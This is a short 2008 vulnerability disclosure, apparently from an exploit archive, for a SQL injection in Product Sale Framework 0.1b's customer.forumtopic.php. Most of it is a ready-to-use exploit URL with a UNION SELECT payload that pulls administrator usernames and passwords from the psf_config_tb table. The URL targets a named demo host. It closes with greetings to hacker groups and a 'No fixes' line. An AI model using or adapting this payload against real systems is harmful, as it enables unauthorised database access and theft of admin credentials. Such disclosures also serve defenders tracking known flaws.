Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability

2008-12-07 06:00:06

+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+ +
+ Product Sale Framework sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 06 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]

#####################################################

APPLICATION : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR : http://www.productsaleframework.com
DEMO (links) : http://www.productsaleframework.com

#####################################################


[+] vuln :
customer.forumtopic.php

vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:

http://www.productsaleframework.com/

[+] Exploit :
Admin Username and Password:

http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb


##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.